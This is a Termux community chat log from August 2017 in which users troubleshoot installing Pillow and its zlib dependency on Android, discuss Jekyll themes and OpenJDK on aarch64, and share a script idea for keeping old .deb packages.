2017-08-24 09:29:11 gitter (Sprite140) sorry I’m new to this.
2017-08-24 09:30:29 gitter (Sprite140) I typed “$ from pillow import Image”
2017-08-24 09:30:36 gitter (Sprite140) then it said
2017-08-24 09:30:57 gitter (cocodevienne) Ok slowly, go and edit the Python script.
2017-08-24 09:31:06 gitter (cocodevienne) Then write there from pillow import Image.
2017-08-24 09:31:25 gitter (cocodevienne) Sorry for being a tad annoyed. @Sprite140
2017-08-24 09:31:37 gitter (Sprite140) it’s okay. I just started last week.
2017-08-24 09:31:46 gitter (Sprite140) when you say edit the python script what do you mean?
2017-08-24 09:32:04 gitter (cocodevienne) Just put that line in, run it and tell me what you see.
2017-08-24 09:32:12 gitter (cocodevienne) Do you have Vim installed?
2017-08-24 09:33:00 gitter (Sprite140) I believe vim is installed
2017-08-24 09:33:23 gitter (Sprite140) so type in .. “from pillow import Image” ?
2017-08-24 09:33:48 gitter (Sprite140) how do I check to see if it’s installed?
2017-08-24 09:34:00 gitter (cocodevienne) No even better
2017-08-24 09:34:13 gitter (cocodevienne) Type python2. You should see a console.
2017-08-24 09:34:29 gitter (cocodevienne) Type there import pillow
.
2017-08-24 09:34:40 gitter (cocodevienne) Tell me what that gives you.
2017-08-24 09:35:08 gitter (Sprite140) it says
2017-08-24 09:35:10 gitter (Sprite140) Traceback (most recent call last):
2017-08-24 09:35:10 gitter (Sprite140) File “
2017-08-24 09:35:10 gitter (Sprite140) ImportError: No module named pillow
2017-08-24 09:36:31 gitter (Auxilus) Seems like pillow isn’t installed
2017-08-24 09:36:49 gitter (cocodevienne) Can you run pip2 install pillow
?
2017-08-24 09:36:52 gitter (cocodevienne) @Sprite140
2017-08-24 09:37:32 gitter (Sprite140) pip2 install Pillow
2017-08-24 09:37:33 gitter (Sprite140) ^
2017-08-24 09:37:33 gitter (Sprite140) SyntaxError: invalid syntax
2017-08-24 09:37:33 gitter (Sprite140)
2017-08-24 09:37:33 gitter (cocodevienne) Lemme deal with it! Btw, I need to make some changes anyway, so I’ll host your package on my repo. But please build it yrself and test it. @Auxilus
2017-08-24 09:37:55 gitter (cocodevienne) Type exit()
and then run the command.
2017-08-24 09:37:59 gitter (cocodevienne) @Sprite140
2017-08-24 09:38:54 gitter (Sprite140) says
2017-08-24 09:38:57 gitter (Sprite140) The headers or library files could not be found for zlib,
2017-08-24 09:38:57 gitter (Sprite140) a required dependency when compiling Pillow from source.
2017-08-24 09:39:05 gitter (Sprite140) then a lot of red
2017-08-24 09:39:06 gitter (Sprite140) saying
2017-08-24 09:39:11 gitter (cocodevienne) Ok hang on.
2017-08-24 09:39:21 gitter (Sprite140) Command “/data/data/com.termux/files/usr/bin/python2 -u -c “import setuptools, tokenize;file=’/data/data/com.termux/files/usr/tmp/pip-build-qyN_cf/pillow/setup.py’;f=getattr(tokenize, ‘open’, open)(file);code=f.read().replace(‘\r\n’, ‘\n’);f.close();exec(compile(code, file, ‘exec’))” install –record /data/data/com.termux/files/usr/tmp/pip-7BqdXl-record/install-record.txt –single-version-externally-managed –compile”
2017-08-24 09:39:21 gitter /data/data/com.termux/files/usr/tmp/pip-build-qyN_cf/pillow/
2017-08-24 09:39:40 frumpylava Pillow is a bit weird to install because of the external zlib.
2017-08-24 09:39:43 frumpylava try this:
2017-08-24 09:39:51 frumpylava pkg install libjpeg-turbo-dev libjpeg-turbo-progs; LDFLAGS=”-L/system/lib/” pip2 install Pillow
2017-08-24 09:41:18 gitter (Auxilus) @cocodevienne okay
2017-08-24 09:41:38 gitter (Sprite140) says successfully installed Pillow-4.2.1
2017-08-24 09:41:55 gitter (Sprite140) if pillow is installed does that mean that PIL should be able to work now?
2017-08-24 09:42:08 gitter (cocodevienne) I found out whats going wrong. Install pillow
as @frumpylava suggested and then make a Python file ending in .py
by running touch test.py
and edit it with Vim
. Execute apt install vim
.
2017-08-24 09:42:12 gitter (cocodevienne) @Sprite140
2017-08-24 09:42:26 gitter (cocodevienne) Then type vim test.py
.
2017-08-24 09:42:43 gitter (cocodevienne) Do that and tell me then what happens.
2017-08-24 09:43:12 gitter (cocodevienne) You should see a black window with lost of tildes on the left side of the screen.
2017-08-24 09:44:14 gitter (cocodevienne) If that is the case, type i
and type this in the first line: import PIL
and in the second type this from PIL import Image
.
2017-08-24 09:44:55 gitter (cocodevienne) Save it by pressing vol up + e and typing :wq
and run it by typing python2 test.py.
2017-08-24 09:45:11 gitter (cocodevienne) If there is no output then all is well.
2017-08-24 09:45:11 gitter (cocodevienne) @Sprite140
2017-08-24 09:46:10 gitter (Sprite140) I should put touch test.py in the python script or just the command?
2017-08-24 09:46:45 gitter (Sprite140) nvm got it
2017-08-24 09:46:46 gitter (Auxilus) Command
2017-08-24 09:46:49 gitter (cocodevienne) Just the command.
2017-08-24 09:47:11 gitter (cocodevienne) If you want to check what happened just type ls
.
2017-08-24 09:48:24 gitter (Sprite140) yes nothing
2017-08-24 09:48:34 gitter (cocodevienne) So it worked?
2017-08-24 09:48:40 gitter (cocodevienne) @Sprite140
2017-08-24 09:49:36 gitter (cocodevienne) Btw, @frumpylava. Fromwhat you told us here you are quite familiar with Jekyll?
2017-08-24 09:49:45 gitter (cocodevienne) I have a question for you.
2017-08-24 09:50:13 gitter (cocodevienne) How could I make a jekyll theme from the themes located at getmdl.io?
2017-08-24 09:50:26 gitter (cocodevienne) Been struggling all morning.
2017-08-24 09:50:36 gitter (Sprite140) python2 main.py
2017-08-24 09:50:36 gitter (Sprite140) Traceback (most recent call last):
2017-08-24 09:50:36 gitter (Sprite140) File “main.py”, line 4, in
2017-08-24 09:50:36 gitter (Sprite140) [full message: https://gitter.im/termux/termux?at=599ed9abba0f0f6e38db1f26]
2017-08-24 09:50:52 gitter (Sprite140) now my situation is saying no module named requests -_-
2017-08-24 09:51:07 gitter (Sprite140) what TF is requests?
2017-08-24 09:51:07 gitter (cocodevienne) Just run pip2 install requests
2017-08-24 09:51:27 gitter (cocodevienne) Its a library to handle http requests.
2017-08-24 09:51:35 gitter (cocodevienne) very useful actually.
2017-08-24 09:51:46 gitter (cocodevienne) How old are you btw?
2017-08-24 09:51:49 gitter (cocodevienne) @Sprite140
2017-08-24 09:52:55 gitter (Sprite140) I’m 21
2017-08-24 09:53:09 gitter (Sprite140) and I should run this in command or script?
2017-08-24 09:53:18 gitter (cocodevienne) The pip command?
2017-08-24 09:53:27 gitter (cocodevienne) in the shell eg as a command.
2017-08-24 09:55:02 gitter (Sprite140) alright great I got it. thank you guys so much :)
2017-08-24 09:55:17 gitter (cocodevienne) No problem.
2017-08-24 09:55:32 gitter (cocodevienne) What are you up to anyway?:D
2017-08-24 09:57:23 frumpylava @cocodevienne You should probably start with the “minima” theme, the defaul jekyll theme. It’s really just a bunch of html files with some liquid syntax intersparsed. There you should be able to include that mdl css and js somewhere. You can then change the html to suit the need of the mdl stylesheet.
2017-08-24 09:58:32 gitter (cocodevienne) So you’re saying I should just start from the jekyll side and not from the MDl side?
2017-08-24 09:58:38 gitter (cocodevienne) @frumpylava
2017-08-24 09:58:46 gitter (cocodevienne) Wow that is complicated.
2017-08-24 09:59:15 gitter (cocodevienne) I mean I know my way around HTML and CSS but even I was struggling today with the simple blog theme.
2017-08-24 09:59:32 gitter (cocodevienne) I mean which fool makes classes for images just to include them??
2017-08-24 09:59:39 gitter (cocodevienne) That is soo ard to maintain
2017-08-24 09:59:49 gitter (cocodevienne) @frumpylava
2017-08-24 10:00:04 frumpylava what do you mean classes for images?
2017-08-24 10:00:38 gitter (cocodevienne) https://github.com/cocodevienne/cocodevienne.github.io/blob/master/stylesheets/styles.css
2017-08-24 10:00:49 gitter (cocodevienne) and do strg + f and type jpg
2017-08-24 10:00:53 gitter (cocodevienne) @frumpylava
2017-08-24 10:00:58 gitter (cocodevienne) then youll know
2017-08-24 10:01:20 gitter (cocodevienne) they actually had this for the source code of the original i just modified it for myself.
2017-08-24 10:01:20 gitter (Auxilus) I also gave jekyll a shot, but it ain’t working well with me :worried:
2017-08-24 10:01:27 gitter (cocodevienne) why?
2017-08-24 10:01:41 gitter (cocodevienne) I can recommend the so simple theme
2017-08-24 10:01:59 gitter (cocodevienne) you have to play around wih it to get the hang of it
2017-08-24 10:02:07 gitter (Auxilus) I found a bit confusing, ik its easy but somehow i did
2017-08-24 10:02:11 gitter (cocodevienne) I am using jekyll for my company
2017-08-24 10:02:17 gitter (cocodevienne) so damn smooth
2017-08-24 10:02:26 gitter (Auxilus) Company?
2017-08-24 10:02:36 gitter (cocodevienne) https://github.com/mmistakes/so-simple-theme
2017-08-24 10:02:39 gitter (cocodevienne) yep
2017-08-24 10:02:49 gitter (cocodevienne) http://voxbyletigre.github.io
2017-08-24 10:02:54 frumpylava @cocodevienne that does seem like a complicated css.
2017-08-24 10:03:01 gitter (cocodevienne) le tigre = me
2017-08-24 10:03:16 gitter (cocodevienne) yep well wrestling with that bs all morning
2017-08-24 10:03:33 gitter (cocodevienne) i mean its totally worth it but still
2017-08-24 10:03:33 gitter (cocodevienne) @frumpylava
2017-08-24 10:03:39 gitter (Auxilus) Tigre = tiger?
2017-08-24 10:03:44 gitter (cocodevienne) @Auxilus
2017-08-24 10:03:46 gitter (cocodevienne) yes
2017-08-24 10:04:02 gitter (cocodevienne) my nickname
2017-08-24 10:04:09 gitter (cocodevienne) my friends used it and then i was like
2017-08-24 10:04:12 gitter (Auxilus) Cool site bro!
2017-08-24 10:04:13 gitter (cocodevienne) yep ill use it
2017-08-24 10:04:22 gitter (cocodevienne) crdits to jekyll
2017-08-24 10:04:29 gitter (cocodevienne) and my designing skills I guess
2017-08-24 10:04:33 gitter (cocodevienne) lol skills
2017-08-24 10:05:04 gitter (Auxilus) Shit, imma learn jekyll
2017-08-24 10:05:31 gitter (cocodevienne) I did say that it is worht it!:)
2017-08-24 10:05:33 gitter (cocodevienne) I can help you if you like.
2017-08-24 10:05:46 gitter (cocodevienne) Start with the theme I linked above
2017-08-24 10:05:52 gitter (cocodevienne) Its simple enough
2017-08-24 10:05:59 gitter (cocodevienne) @Auxilus
2017-08-24 10:06:08 gitter (Auxilus) Sure ill go with it..
2017-08-24 10:06:13 gitter (cocodevienne) ok
2017-08-24 10:10:56 frumpylava “So-simple-theme” seems good for when you want to get a site up as fast as possible. If you’re a webdeveloper and are trying to build your own website with your own design, I’d start with the “Minima” theme, which is fairly easy to understand. And if you don’t like “themes” you can just copy the Minima theme files to your jekyll root directory and edit it directly. It’s very easy to understand how it all
2017-08-24 10:10:57 frumpylava works that way, as you don’t need to interact with ruby at all this way. No need to make your own ruby gem for your own theme.
2017-08-24 10:12:23 gitter (cocodevienne) Hm seems a good way to approach it. No because I want to jekyllize the blog theme from the mdl site. So that I can make an easy blog and a maintainable one.
2017-08-24 10:18:01 gitter (cocodevienne) Btw @Auxilus I recommend doing it on your PC. Doing it from Termux is bit demanding because of screen size etc.
2017-08-24 10:19:37 frumpylava @cocodevienne This is just a form factor issue. Nothing in Termux prevents doing jekyll. If he has an android tablet and a keyboard Termux can do it just as well.
2017-08-24 10:29:18 gitter (cocodevienne) Just saying what is easier:)
2017-08-24 10:30:36 g093 https://pages.github.com
2017-08-24 10:33:37 g093 i find it’s easiest to have your websites in your pocket @cocodevienne
2017-08-24 10:34:12 gitter (cocodevienne) k
2017-08-24 10:43:55 g093 The virtual keyboard is the lightest of all, and with multifinger typing…
2017-08-24 10:45:10 g093 lightening many fingers speed is stimulating, to state least of all.
2017-08-24 10:48:33 g093 will we ever forget that 🐁 mouse, the one matrix transformed into a tap in a little brick 🏠 house.
2017-08-24 10:48:48 g093 tap *tap tap
2017-08-24 10:51:12 g093 onscreen garbage
2017-08-24 10:51:36 g093 in weechat aarch64 on Termux v53 on OS 6.0.1
2017-08-24 10:56:01 g093 OS 6.0.1 *OS 6.0.1 Marshmellow
2017-08-24 11:16:42 g093 Termux als Betriebssystem
2017-08-24 11:16:42 g093 Das Linux in der Tasche
2017-08-24 11:18:01 g093 https://plus.google.com/109614420080028230010/posts/dQQmwQrwqq8
2017-08-24 13:54:39 gitter (Hax4us) Can I install pillow @cocodevienne
2017-08-24 13:58:46 gitter (Hax4us) How to install zlib (I think it is required) @cocodevienne
2017-08-24 14:20:42 gitter (fortes) Apologies for the newbie question, but how do folks handle backups for your files in termux?
2017-08-24 16:04:12 zub Hi. I’m wondering: what happens to a running termux session when I suspend my phone (or well, press the power button so the display turns off, at least). I see there is an “acquire wakelock” in the status bar, bu what happens if this is not selected?
2017-08-24 17:33:28 gitter (cocodevienne) Hey @Hax4us copy and run this: pkg install libjpeg-turbo-dev libjpeg-turbo-progs; LDFLAGS="-L/system/lib/" pip2 install Pillow
2017-08-24 23:49:21 gitter (vishalbiswas) live_the_dream: how’s the performance compared to arm? You should make a pull request including all of your changes. If it’s better than arm, it might be a good idea to blacklist arm and enable the package
2017-08-24 23:52:10 live_the_dream arm64 replaces aarch64 they are different but both 64 bit
2017-08-24 23:52:45 live_the_dream well technically aarch64 should replace arm64 but android is lacking stuff so not working
2017-08-24 23:53:19 live_the_dream it doesn’t replace arm it just means all archs should eork somewhat
2017-08-24 23:53:35 gitter (vishalbiswas) live_the_dream: yes i know, but we were using arm java on aarch64 until now
2017-08-24 23:53:44 live_the_dream yeah
2017-08-24 23:54:21 gitter (vishalbiswas) so are you seeing improvements over arm? how about that tomcat bench?
2017-08-24 23:55:19 live_the_dream hzven’t tested it yet
2017-08-25 00:06:47 g093 https://plus.google.com/109614420080028230010/posts/Ey4eBAxASFM
2017-08-25 00:19:37 live_the_dream k i forgdt what was the actual bench?
2017-08-25 00:20:22 live_the_dream compiling tomcat with ant?
2017-08-25 00:21:12 gitter (vishalbiswas) running tomcat without rebooting phone
2017-08-25 00:26:42 g093 Can anyone tell my why my poem about Termux is not posting at https://termux.com/community
2017-08-25 00:28:11 g093 I posted at https://plus.google.com/109614420080028230010/posts/Ey4eBAxASFM and it has not accessable at https://termux.com/community
2017-08-25 00:28:21 g093 wtf
2017-08-25 00:29:01 g093 no listing for ndks, sdks now this…
2017-08-25 00:41:44 rods-tab3 did it rhyme ?
2017-08-25 00:42:43 g093 https://plus.google.com/u/0/117492594531181986853/posts/3KQuY24kK32
2017-08-25 00:43:04 g093 I also have a question. Why are my posts here at Google+ disappearing and reappearing, at times? Like plus.google.com - It is easiest to have websites in your pocket📲 The virtual keyboard is the… for instance? And others, my posts regarding https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsOnDevice were gone, wiped off Google+ a short while before for a couple of weeks, if you have not
2017-08-25 00:43:04 g093 noticed! Then suddenly to reappear. What gives?
2017-08-25 00:43:04 g093 +selvin gomez Can you please tell us what is so fantastic about aview that you want us all to have it on our deviceas? A little more information including links are very welcome.
2017-08-25 00:43:04 g093 It is easiest to have websites in your pocket📲 The virtual keyboard is the…
2017-08-25 00:43:04 g093 It is easiest to have websites in your pocket📲 The virtual keyboard is the…
2017-08-25 00:43:04 g093 plus.google.com
2017-08-25 00:43:50 g093 It is easiest to have websites in your pocket📲
2017-08-25 00:43:50 g093 The virtual keyboard is the lightest of all, and with multi-finger typing💅
2017-08-25 00:43:50 g093 Lightening many fingers speed is enlightening, to say least of all👂
2017-08-25 00:43:50 g093 Will we ever forget that 🐁 mouse? The one matrix transformed into a tap tap at the window of a little brick 🏠 house.
2017-08-25 00:43:50 g093 686 packages that are available for all and arm computer architectures for Termux on Android as of 2017-08-24.
2017-08-25 00:43:50 g093 https://sdrausty.github.io/pages/more
2017-08-25 00:45:53 rods-tab3 bbecause those posts by sd rausty and you not him; you g093
2017-08-25 00:46:37 gitter (sdrausty) The DVR in Termux does more than ROCKN
2017-08-25 00:46:40 gitter (sdrausty) !
2017-08-25 00:47:16 gitter (sdrausty) youtube-dl && play-audio
2017-08-25 00:47:58 g093 ? rods-tab³
2017-08-25 00:48:17 g093 g*
2017-08-25 00:49:58 live_the_dream how is this meant to start exactly?
2017-08-25 00:50:55 g093 matrix transformed *the matrix transformed
2017-08-25 00:54:24 g093 live_the_dream: It began before you were birn here on this planet, rock, muddy rock, trashed and trashing muddy ball spinning round and round what the sun is spinnin’ aroud,
2017-08-25 00:54:52 g093 were birn *were born
2017-08-25 00:55:34 g093 spinnin’ aroud *spinnin’ around
2017-08-25 00:56:55 live_the_dream k its running
2017-08-25 00:57:44 live_the_dream im assuming at some point its meant to not use 100% of all cpu?
2017-08-25 00:58:09 g093 Copernicus was wrong. The ⛅ Sun is not the center. Neither is the center of the Milkyway the center. It all spins round and round. Have you seen 2001 - A Space Oddessy?
2017-08-25 00:59:25 g093 also sprach zarathustra
2017-08-25 01:00:33 g093 A little DVR programming youtube-dl https://m.youtube.com/watch?v=IFPwm0e_K98
2017-08-25 01:00:40 live_the_dream ok i can run tomcat without rebooting ph
2017-08-25 01:00:55 g093 youtube-dl https://m.youtube.com/watch?v=IFPwm0e_K98 *youtube-dl https://m.youtube.com/watch?v=IFPwm0e_K98
2017-08-25 01:01:34 g093 Alternative, one of a few https://m.youtube.com/watch?v=ETveS23djXM
2017-08-25 01:01:43 g093 I see stars.
2017-08-25 01:02:11 gitter (vishalbiswas) live_the_dream: new milestone
2017-08-25 01:03:13 g093 Beautiful cresent 🌒 Moon this evening btw
2017-08-25 01:04:50 g093 garbage pronounced gardaje on screen in weechat Termux v 0.53 OS 6.0.1 Marshmallow
2017-08-25 01:05:10 g093 more gar
2017-08-25 01:06:07 g093 more
2017-08-25 01:06:54 g093 Richard Strauss - Also sprach Zarathustra, Op. 30
2017-08-25 01:07:54 g093 ta da
2017-08-25 01:08:04 g093 boom
2017-08-25 01:08:09 g093 boom
2017-08-25 01:08:12 g093 boom
2017-08-25 01:08:16 g093 ta da
2017-08-25 01:09:04 g093 youtube-dl && play-audio
2017-08-25 01:09:08 g093 ta da
2017-08-25 01:09:16 g093 DVR
2017-08-25 01:09:28 g093 in your pocket
2017-08-25 01:11:17 g093 https://m.youtube.com/results?q=also+sprach+zarathustra
2017-08-25 01:11:21 g093 2001
2017-08-25 01:11:38 live_the_dream its unfortunate that a lot of stuff i need for java requires jvm8
2017-08-25 01:11:58 g093 I see stars. Didn’t it begin with stones, or a stone?
2017-08-25 01:12:45 gitter (vishalbiswas) live_the_dream: jamvm or anything similar?
2017-08-25 01:13:01 gitter (vishalbiswas) if i remember correctly there was a pull request for jamvm
2017-08-25 01:13:01 g093 wherez java in Termux live_the_dream: the stuff Sndroid is made of ?%
2017-08-25 01:13:12 live_the_dream bazel
2017-08-25 01:13:19 g093 Sndroid *Android
2017-08-25 01:13:36 live_the_dream its googles build system
2017-08-25 01:13:57 g093 @vishabiswas No command ‘javmn’ found, did you mean:
2017-08-25 01:14:19 gitter (vishalbiswas) g093: jamvm was closed without merging
2017-08-25 01:14:34 g093 No command ‘jamvm’ found, did you mean;)
2017-08-25 01:15:09 gitter (vishalbiswas) https://github.com/termux/termux-packages/pull/118
2017-08-25 01:15:25 g093 Where’s simple helloWorld.java @vishalbiswas ?
2017-08-25 01:16:56 g093 live_the_dream: Where’s simple helloWorld.java on Termux, please?
2017-08-25 01:17:36 gitter (vishalbiswas) here (helloWorld.java)
2017-08-25 01:17:37 gitter (vishalbiswas) ```java
2017-08-25 01:17:37 gitter (vishalbiswas) class helloWorld {
2017-08-25 01:17:37 gitter (vishalbiswas) [full message: https://gitter.im/termux/termux?at=599fb2f0578b44a046e6ec2e]
2017-08-25 01:18:29 g093 next is compile, with? what? please?
2017-08-25 01:19:27 g093 In Termux on device…
2017-08-25 01:20:13 gitter (vishalbiswas) might be available pretty soon if live_the_dream’s changes gets merged and enabled
2017-08-25 01:20:42 gitter (vishalbiswas) I just want to have a stable gradle on my termux
2017-08-25 01:21:07 g093 which OS flavor? yum yum
2017-08-25 01:21:20 gitter (vishalbiswas) ?
2017-08-25 01:21:32 g093 sability is sanity
2017-08-25 01:21:50 g093 sability *stability
2017-08-25 01:22:20 g093 Can we have stable, testing, experimental at termux.net ?
2017-08-25 01:22:40 g093 like @debian
2017-08-25 01:22:46 g093 .org
2017-08-25 01:24:34 live_the_dream no we don’t have the man power to be doing stuff like that
2017-08-25 01:25:18 g093 I am very sure we can have stability in Termux simple by followind debian’s model of stable & stable+
2017-08-25 01:26:16 g093 live_the_dream: Manpower or scripting know how?
2017-08-25 01:26:35 live_the_dream man power
2017-08-25 01:27:17 g093 @fornwall stated we do not keep the old debs.
2017-08-25 01:27:40 g093 That’s fine since it require resources.
2017-08-25 01:29:52 g093 So @sdrausty has made a little script to keep the old, hopefully working stably debs. It should be posted at https://github.com/sdrausty/au shortly.
2017-08-25 01:30:28 g093 live-the_dream: people power?
2017-08-25 01:30:57 live_the_dream yeah testers and those capable of fixes bugs
2017-08-25 01:32:25 g093 You should be able to write it by yourself.
2017-08-25 01:33:37 g093 mkdir /sdcard/deb
2017-08-25 01:34:33 g093 mv /data/data/com.termux/files/usr/var/cache/apt/archives/*.deb /sdcard/deb
2017-08-25 01:34:40 g093 pkg up
2017-08-25 01:34:45 g093 thats it
2017-08-25 01:35:20 g093 well almost what do u do to downgrade
2017-08-25 01:35:57 g093 dpkg –purge pkg_name
2017-08-25 01:36:01 g093 then
2017-08-25 01:37:20 g093 dpkg –install pkg_name
2017-08-25 01:37:53 g093 a little more stability in Termux please
2017-08-25 01:41:59 g093 live_the_dream: i know we unfortunantly are short, compare debian <70k packages
2017-08-25 01:49:30 g093 it require *it requires
2017-08-25 01:50:22 g093 automatation should be our priority
2017-08-25 01:54:03 g093 for expample does anyone know how travis (https://travis-ci.org) can build https://github.com/sdrausty/buildAPKs and submodules correctly since they require and OS thst is not on the list yet as far as I can tell of OSes they confirm builds on?
2017-08-25 01:54:53 g093 and OS thst *an OS that
2017-08-25 01:55:34 g093 How automated is travis, anyone?
2017-08-25 01:56:57 g093 Why is Termux not on Travis’ OS build list?
2017-08-25 01:57:28 g093 Anyone?
2017-08-25 01:58:54 g093 Why are there so few Termux users? Everyone has an Android in their pocket, right?
2017-08-25 02:16:58 gitter (Hax4us) @cocodevienne same error ….The headers or library files could not be found for zlib,
2017-08-25 02:16:58 gitter (Hax4us) a required dependency when compiling Pillow from source
2017-08-25 02:17:10 gitter (Hax4us) Anyone can help ?
2017-08-25 02:26:45 live_the_dream you need to symlink libz.so in termux libdir
2017-08-25 02:27:19 live_the_dream so ln -s /system/lib/libz.so $PREFIX/lib/libz.so
2017-08-25 02:27:28 live_the_dream if using 64 bit
2017-08-25 02:27:34 live_the_dream so ln -s /system/lib64/libz.so $PREFIX/lib/libz.so
2017-08-25 02:29:01 live_the_dream without so bit obviously
2017-08-25 02:29:22 live_the_dream that should get python to notice it has zlib
2017-08-25 02:39:14 gitter (Auxilus) @cocodevienne @frumpylava jekyll is working nice for me!
2017-08-25 03:13:20 gitter (sdrausty) I’d like an opinion, or a few
2017-08-25 03:13:36 gitter (sdrausty) About https://github.com/sdrausty/au
2017-08-25 03:18:11 gitter (Hax4us) @sdrausty great…it is very useful
2017-08-25 03:20:38 gitter (sdrausty) tnx @Hax4us
2017-08-25 03:23:29 frumpylava sdrausty: Few toughts. Interessting idea. I might actually use this myself. Until now I had the whole $PREFIX as a .git directory, which I commit to before updating, but this seems better. About your code: You don’t really need the if statement, you can just use mkdir -p /sdcard/debs
.
2017-08-25 03:23:38 frumpylava why use mv instead of cp?
2017-08-25 03:24:02 frumpylava You could use rsync if it is installed, which would probably be the best way to update the /sdcard/debs directory.
2017-08-25 03:25:20 gitter (sdrausty) frumpylava: Thank you for your questions and comments 🙂
2017-08-25 03:27:05 gitter (sdrausty) mv
to save space; Ideally destination directory should be on external micro SD card.
2017-08-25 03:28:46 gitter (Hax4us) Yes mv is better for save space ….
2017-08-25 03:29:34 frumpylava Does apt not need these debs for something? Why would they be kept around otherwise?
2017-08-25 03:37:07 live_the_dream hmmm can’t use github to distribute openjdk the debs are too large
2017-08-25 03:37:18 live_the_dream i could probably split it into sub pacakges
2017-08-25 03:38:03 gitter (sdrausty) I just pushed your mkdir -p
suggestion to
2017-08-25 03:38:04 live_the_dream anyway openjdk should compile for aarch64 now